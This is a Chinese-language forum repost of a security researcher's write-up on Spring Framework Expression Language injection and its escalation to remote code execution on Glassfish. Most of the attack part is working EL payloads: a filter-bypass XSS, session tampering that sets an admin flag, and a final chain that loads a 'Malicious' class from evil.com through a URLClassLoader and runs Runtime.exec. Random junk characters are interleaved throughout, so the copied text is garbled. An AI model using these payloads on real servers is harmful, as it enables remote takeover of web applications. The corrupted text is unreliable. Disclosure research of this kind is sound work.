Remote Code with
8 X; {9 i% q$ f) o+ EExpression Language Injection m" D3 b) @. p# w) j6 m
Spring Framework脆弱性—DanAmodio
d$ x/ u: J& R全世界超过22,000组织已经下载了131.4万过时的Spring Framework,使用在业务中
1 g b& D' [' I可能会存在风险。
+ l: O: Z3 K; s. w5 \在2011年,来自Minded Security 的Stefano Di Paola 和来自Aspect Security的$ C' ] p; {* |$ W8 m6 u
Arshan Dabirsiaghi 在Spring Framework中发现了一个有趣模式。Stefano创造了Expression Language (EL) 注入。他们的发现披露了某些双重的解析EL 的spring 标签可2 m" ?( x/ x% @0 t
以泄露服务器上的敏感数据。这是由于spring 提供了独立于jsp/servlet容器的EL支持,
! D+ r c; z9 I4 A/ A6 p) _以此来作为向下兼容的一种方式。因此在jsp2.0之前,EL 是不被支持的。这个功能在当前/ w$ K. d2 _* ]% p* O# \) L
版本中是默认打开的,应用程序使用了此模式描述是易受攻击的。 w2 [' `4 U/ {- M. Q
由于每个应用程序并不都会出现反射xss这种弱点,虽然很难量化它的深度和广度,但1 t! m! n+ d! {) M0 N
我们根据Sonatype最新的统计知道,全世界超过22,000的组织下载Spring 3.0.5以下版& Z4 n0 V+ I m8 ~: [3 x
本已经超过131.4 万。Point-in-fact, one large retail organization consumed 241 different artifacts, 4,119 total downloads。! ^; I- [. Q6 b" y
这些版本不支持禁用double EL resolution.1 R) o' ?+ P6 `
这个问题原来的影响是信息泄露,但是我将举例说明它如何在Glassfish 和其他包含1 K& B1 g- X. r# \
EL2.2容器上可能进行远程代码执行。# y' Z' n- z, q; {
这是一个原始信息泄露的攻击例子:
2 n0 x" ]; s! N) S0 C. v请求:
& p4 I. l3 c( Tttp://vulnerable.com/foo?message=${applicationScope}! R7 Z1 ^+ u5 e1 x7 N4 o
到达以下内容页面:2 B: w# D, \& u" C+ A
结果将输出一些包含内部服务器信息calsspath 和本地工作目录! \/ W; M; R1 m/ a" q: S/ s6 ~7 L
你也可以做一些其他事情,如这样:3 E ~. k4 s2 e" J
${9999+1}
) S$ F9 I. T2 D2 _# B& ~还可以访问session 对象和beans5 L _; a% c6 d7 K+ b- e
${employee.lastName}
# ?4 a' s' X* a( Y/ L在执行Glassfish上客户端应用程序的渗透测试时,我遇到了同样的模式,知道大概是
% E# N1 f; G" r! \6 t3 VEL 注入,做了额外的测试后,确认了这一发现,同时延续下去,我想挖掘一些有滋味的东' X0 _0 K0 z5 ~; M( \
西,比如XSS.2 {9 E |; j! I7 k6 ^
哎,应用程序的输入过滤终止了我的请求,因此去掉了””标签$ C6 i4 o' G* Y" Q
突发奇想,我想“我可以在JAVA中进行字符操纵,为什么我不试试利用EL来绕过过滤% Y; q5 F9 T$ d+ t7 b
呢?”0 s1 D" l3 H/ w# a9 S
因此,我尝试巳缦拢�# b) m7 l6 N* k! ], T. f' M6 i0 L
http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,”Q”)}foo=PPPP
$ C E0 i; w3 P9 pP# k6 w+ ?5 V! u$ ?
我注意到返回的错误代码时QQQQQ,由于String.replaceall 方法已经被调用,所以返
: w# N8 a* O1 E8 F4 S7 \" A( @回的文本被插入进了spring:message 标签。) }$ S: q+ n0 l! t
这里是一个最终绕过过滤的实例:
& d% u7 P- H4 |http://vulnerable.com/app?code=${param.foo.replaceAll(“P”,””)}&foo=PscriptQalert(1) /scriptQ0 G1 f* k j" g- s
它运行的很好,接下来一个小时我什么都没想。然后我认识到他是真的真的糟糕的。为
. u" i; V2 [' B, P% W f, V8 k什么可以在EL中像这样插入方法。接下来,我还可以做些其他好玩的事情呢?8 ?, ?/ N; n" \' B# G$ u
经过一番研究,我学习到EL2.2 增加了方法调用。1 w- V Z/ ~. h% ^5 q
我写了一个快速测试应用程序代码并且检测一些功能. W, n7 a2 C4 {0 j
${pageContext.request.getSession().setAttribute(“account”,”123456″)}
' E: Q8 i" U) F! b) ~, t2 u${pageContext.request.getSession().setAttribute(“admin”,true)}) [: M% X. c4 z
好了,会话对象修改是一个明显的风险。我真的想接触到对象,但是我没有一个直接的: X1 V4 N$ r7 z7 r, K
指向pageContext对象,也许我可以使用反射,像String.getClass().forName(string)?9 Z3 A* f* x) c C
${“”.getClass().forName(“java.net.Socket”).newInstance().connect(“127.0.0.1$ e- Q& I" f2 `! i
“, 1234)}2 d) K' h' E/ g# \
${“”.getClass().forName(“java.lang.Runtime”)}
% t% z1 b2 k6 [* ^( Y哇,没有方法让它工作,由于可以接触到任何东西这可是灾难性的。不幸的是,它是不
1 E% E( }$ Q3 p9 Z可能调用newinstance()初始化许多危险类(如Runtime),由于它们没有提供默认的构造函% D5 j: }! @) e# E6 O4 {
数,我们无法创建对象。当它请求null或者一个空数组,getMethods()[0].invoke()会有
6 {1 [5 S3 J4 U( b& s一些问题。在传递数据到方法之前,EL 似乎是理解它为一个字符串字面值。我猜测是由于
$ T- K" F# o+ b7 |( ]9 `& A- L, B( Y方法签名invoke(Object obj, Object„ args)& y& ^! T* V9 L& s# ?1 O1 Z0 m F
Jeff Williams (Aspect Security 和OWASP核心创始人) ,Arshan,和我都思考这个问
6 ?( {+ e4 w/ z* S3 F题,以让它可以工作起来。. `4 ~5 n# j$ z2 X% O% x9 \
漏洞利用:) ~% G# g: ]" `7 L2 S( v
我在墙上撞的我的脑袋bangbang响,我已经用尽了所有想法,现在我们公开这个,我/ E$ K) |% ^: i, c+ A$ ~; {: z
希望你们中的一些JAVA奇才告诉我我是如此的可笑。
" B0 {8 b$ `) {0 e% F& r3 o" b1 ^& i这里有一些我试过的失败的用例,为了试图让它工作的用例:4 l8 J! v. e/ L
写文件到文件系统
5 K1 T# p) K& h+ u 试图载入org.springframework.expression.spel.standard.SpelExpressionParser.8 M" p+ B4 G4 v' ^& _
我认为这些可以很好的工作,但是我不能找到合适的类来载入。
`. h! Q/ P- @${pageContext.getClass().getClassLoader().loadClass(“org.springframework.expression.spel.standard.SpelExpressionParser”)}$ Z* E1 n; Y) V6 ^4 l2 u
javax.servlet.jsp.el.ELException: java.lang.ClassNotFoundException:
% i& H. t7 F- C: R1 Porg.springframework.expression.spel.standard.SpelExpressionParser not found
' p- A3 u. ^+ ?# n/ Y6 n$ Xby
3 ]0 I- F Q; gorg.glassfish.web.javax.servlet.jsp [194].+ {$ ~; Q# ]% F' A
利用反射来修改java.lang.Runtime.currentRuntime的属性为Public E& X& f6 g6 `3 G6 ~5 h! R: o }+ e
利用反射来创建一个新的Runtime(and watch the world burn)
* M$ A# s) t" E9 P${pageContext.request.getSession().setAttribute(“rtc”,”".getClass().forName
6 W0 d* k9 b% B2 ^% `# {(“java.lang.Runtime”)).getDeclaredConstructors()[0])}
& j" d) g+ S2 L; A${pageContext.request.getSession().getAttribute(“rtc”).setAccessible(true)}5 b2 S8 D% [9 e2 T2 U
使用java.lang.ProcessBuilder+ t |8 m9 P, @4 X; A8 ?
用表达式语言来评估表达式语言
: z% n; o' p4 u- C( P2 dExpression-ception ! 在这点我想我快疯了,载体并没有任何实际意义.
% v4 A# C, ~9 _${pageContext.getExpressionEvaluator().parseExpression(“pageContext.request
/ E3 s6 p+ m, ?* c4 w+ h* A“,”".getClass(),null)}6 m! D( _5 d+ l) x: S
创建一个ObjectInputStream,序列化一个类并将其作为一个参数发送(也有点疯狂)
- t. D/ f! F0 K8 c: ?% A% p我在使用一个空数组通过Method.invoke()时失败了很多次
; \# g2 d G$ }8 }$ [5 X“”.getClass().forName(“java.lang.Runtime”).getMethods()[5].invoke(param.foo; K7 {- I8 r- _5 ~3 a# Z
.getClass().forName(“java.lang.Runtime”),”".getClass().forName(“java.util.A
" k( q* Y8 ]$ r6 b+ P) DrrayList”).newInstance().toArray()). n+ \/ A2 }: H8 z( `
java.lang.IllegalArgumentException: wrong number of arguments
- m% J2 E5 a& J0 S最后,有一天晚上我被绊倒在一个问题前:我能得到一个URLClassLoader,因此我可" M" W; d& U. {* g9 ^- l b
以创建一个恶意class文件并且指向类装载器.
& D* \3 X2 v# A! V0 q! I# T我写了一个JAVA 类,它试图打开服务器上的计算器,来证明远程代码执行:3 G& n7 Z! j/ x+ }1 k9 w A
public class Malicious {% H$ N* |& v3 z6 l9 X9 Z
public Malicious() {" ]$ o1 J2 T" M! M4 d6 g+ i5 w
try {6 J! M" T5 `/ m- y
java.lang.Runtime.getRuntime().exec(“open -a Calculator”); //Mac
; P) g7 A0 z! h4 t% A' J- |java.lang.Runtime.getRuntime().exec(“calc.exe”); //Win
: I+ S3 {6 @4 W+ h} catch (Exception e) {
8 m) l5 ]) N! M4 Z}
4 M1 Q: V6 K- ^' H3 p. K" p}' c6 ]+ z; T8 d; Y l
我们创建了一个数组列表将被用于构造一个新的URLClassLoader,它需要被存储在回
" U# Y8 q& [& f/ z话中,因此它可以被使用.
( F! @- y- G2 S+ {' H" R& A" t8 t* E${pageContext.request.getSession().setAttribute(“arr”,”".getClass().forName) x9 m8 g, y- ?4 N
(“java.util.ArrayList”).newInstance())}/ E j# F7 _0 `
URLClassLoader 提供了一个newInstance 方法,它接受URL对象数组。我们需要创建! {5 I5 c2 I5 |( x" C8 }
一个新的包含我们恶意代码路径的URL。ServletContext可以提供给我们一个URL对象和
8 o$ i0 M, b: y; l5 O* I2 I& cgetResource(string) 方法,但是我们不可能直接创建一个新的实例。然而URI提供了一个; i; i1 y5 j8 v |
我们可以调用的create(string)方法,然后转换对一个URL对象。7 j' {% m* A# l1 z
${pageContext.request.getSession().getAttribute(“arr”).add(pageContext.getServletContext().getResource(“/”).toURI().create(“http://evil.com/path/to/wh
8 _5 S! t: H; Q; f- i n. c% X6 gere/malicious/classfile/is/located/”).toURL())}9 \+ W7 r+ m% V3 i
然后我们发现了一个到URLClassLoader指示器,因此newInstance 方法可以被调用,
# t$ z4 p0 E8 G& \恶意类文件被装载并创建,触发远程代码.+ z, |! d- c8 N% Y6 X
${pageContext.getClass().getClassLoader().getParent().newInstance(pageConte
6 o9 j5 y/ s7 b' U% s# m; F& Bxt.request.getSession().getAttribute(“arr”).toArray(pageContext.getClass().# O B; L! ^+ C
getClassLoader().getParent().getURLs())).loadClass(“Malicious”).newInstance
. l6 f5 J3 \; |& [, H# I2 x5 h()} |
发表于 2013-2-16 21:47:24
收藏
支持
反对